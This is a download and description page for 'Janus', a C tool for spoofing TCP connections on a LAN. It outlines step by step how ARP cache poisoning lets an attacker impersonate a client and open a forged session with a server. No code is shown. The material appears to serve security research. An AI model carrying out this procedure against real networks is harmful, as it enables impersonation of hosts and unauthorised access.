Download

Janus v1.0

Janus [ZIP - 5.77 KB]

Janus

About

Janus is a non blind TCP/IP connection spoofer. It allows you to forge a fully open connection masquerading as another active host on the LAN or segment. To avoid interference from the active host being spoofed, janus implements ARP cache poisioning. To find out more about this type of attack read our two detailed papers on the subject:

Security Weaknesses Inherent in the Design of TCP Over IP [PDF]

ARP Poisoning : An investigation into spoofing the Address Resolution Protocol [PDF]

The Players

The Objective

The attacking host must eshtablish a fully open TCP/IP connection to the server masquerading as the client. To avoid the client tearing down the connection the attacker must alter the servers ARP cache, changing its entry for the clients MAC address to a fake, unused one. The clients ARP cache is left unscathed. All subsequent ether frames (and their encapsulated packets) sent to the server from the attacker masquerading as the client will use the MAC address as seen in the servers ARP cache entry.

The Attack

• Get the clients MAC address (00-A0-20-DD-EE-BB)
• Get the servers MAC address (00-A0-20-DD-EE-AA)
• Alter the clients MAC address (e.g 00-A0-20-DD-EE-FF)
• Poision the servers ARP Cache via a fake ARP Reply, thus changing the clients entry
• Send first TCP/IP packet in the three way handshake to the server masguerading as the client
• Read the servers responce (second packet in the three way handshake) off the wire
• Send third TCP/IP packet in the three way handshake to the server masguerading as the client
• The connection is now open so send any and all data
• Close the connection by sending a RST packet to the server masguerading as the client
• Restore the servers ARP Cache via a fake ARP Reply

The Code

Janus is written in C and is reliant on the libcap and libnet librarys for low lever packet creation, insertion and capturing. You will need to have these two librarys installed to compile the source.